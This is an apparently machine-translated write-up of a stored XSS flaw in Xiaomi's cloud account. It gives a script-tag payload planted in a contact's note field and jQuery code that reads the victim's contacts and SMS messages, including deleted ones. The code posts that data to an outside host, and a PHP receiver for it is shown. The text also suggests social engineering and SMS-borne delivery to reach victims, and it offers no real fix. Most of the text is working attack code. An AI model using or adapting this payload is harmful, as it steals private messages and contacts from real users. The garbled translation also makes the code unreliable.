Xiaomi account XSS can obtain private information

Isn't one of the most popular features: Shake mobile phone sharing contacts? The story starts from here;
Scenario hypothesis:
A: Hey, MAN, are you using Xiaomi's cell phone too?
B: Of course, Xiaomi's mobile phone!
A: I recently got A call from XX leading role! For a friend's sake... However, you must log on to I .xiaomi.com to synchronize to the computer to see the number.
B: Okay! Okay!
As a result, I log on to I .xiaomi.com, and I will see nothing. At the same time, A collects the Xiaomi account name of B on the other end of the computer! Mobile phone contact! SMS!
Open the subject and log on to the Xiaomi account. The contact details are displayed on the right,

It can be seen that the phone number and email format are not filtered out.
For insurance purposes, we should select a place where many characters can be written. That's a note!
<Iframe src = "http://www.baidu.com"> </iframe>
<Script> alert (/xss by cp0204/); </script> the write is successful!



Who said that XSS is of little value depends on how you use it. I tried to capture packets, but the Xiaomi account is https. It is very difficult to capture packets. I will analyze it using a browser.

Continue

All of them are captured and correspond to three columns respectively. Now we want to find a way to collect the data.
It can be seen that it is like this, 37009121 of which is my Xiaomi ID, and the following parameters do not know anything, no matter it is useful or useless, but it can be obtained through JS
Https:// I .xiaomi.com/contacts/37009121/full? _ Dc = 1342331522472 & syncTag = 0 & limit = 500 return:
{"Result": "OK", "description": "successful", "data": {"content": {"9204442": {"content ": {"id": 9204442, "status": "custom", "tag": 10327278, "organizations": [{"title": "lead", "company ": "related departments"}], "emails": [{"value": "Cp0204@qq.com", "type": "home"}], "phoneNumbers ": [{"value": "123456", "type": "mobile"}], "displayName": "related departments", "note ": "<Iframe src = \" http://www.baidu.com \ "> <\/iframe> \ n <script> alert (/xss by cp0204/); <\/script> "}, "spinyin": "ygbm", "type": "contact", "pinyin": "youguanbumen" }}, "lastPage": true, "letterIndex ": {"Y": [9204442]}, "group": [], "syncTag": 10327278}, "code": 0}
Jquery has been introduced to the website, which makes it much easier for me to write js to get data.
// Obtain the contact
Result1 = getdata ("/contacts/" + mid + "/full? SyncTag = 0 ");
// Get text message
Result2 = getdata ("/sms/" + mid + "/full/thread? SyncTag = 0 & limit = 20 & _ dc = 1342338505981 & readMode = older "); // All
Result3 = getdata ("/sms/" + mid + "/locked? SyncTag = 0 & limit = 20 & _ dc = 1342338505981 & readMode = older "); // Add to favorites
Result4 = getdata ("/sms/" + mid + "/deleted/thread ?? SyncTag = 0 & limit = 20 & _ dc = 1342338505981 & readMode = older "); // deleted
 
Function getdata (url ){
Var data
$. Ajax ({
Url: url,
Async: false,
Success: function (result) {data = obj2str (result );},
});
Return data;
}
............ Then, collect
$. Post ("http://cptimer.sinaapp.com/mi/mi.php? Mid = "+ mid +" & data = "+ data, {mid: mid, data: data}, function (result ){
Alert (result); // return mid data
}); By The Way, jq ajax cannot be cross-origin, but it can be submitted, but no response is returned. So here post is acceptable, mi. php
<?
$ Mid = $ _ REQUEST ['mid '];
$ Data = $ _ REQUEST ['data'];
Echo "Xiaomi ID:". $ _ REQUEST ["mid"]. "\ n account data:". $ _ REQUEST ["data"];
?>
In this way, all contacts and text messages are collected.
Do you have any tips to add the following in your remarks? Do you want to test it for learning...
<Script src = "http://cptimer.sinaapp.com/mi/mi.js"> </script>

============================ Final summary ==============================

When I learned something, Daniel smiled. The small XSS is also a big problem. Many people despise XSS. Maybe those people will only pop up a window.
There is also how to transfer the contact to others with the help of social engineering.
In addition, if you have a Xiaomi mobile phone, you can test whether the text box can be attacked. If you can, it will be easier! Send an xss text message and ask him to read the text message from His Xiaomi account... Another idea is that it cannot be tested without Xiaomi mobile phones.
It is still very valuable to steal these things. Imagine that all your contacts and text messages are leaked...
Important personnel, such... Relevant department leaders







Solution: you are better than me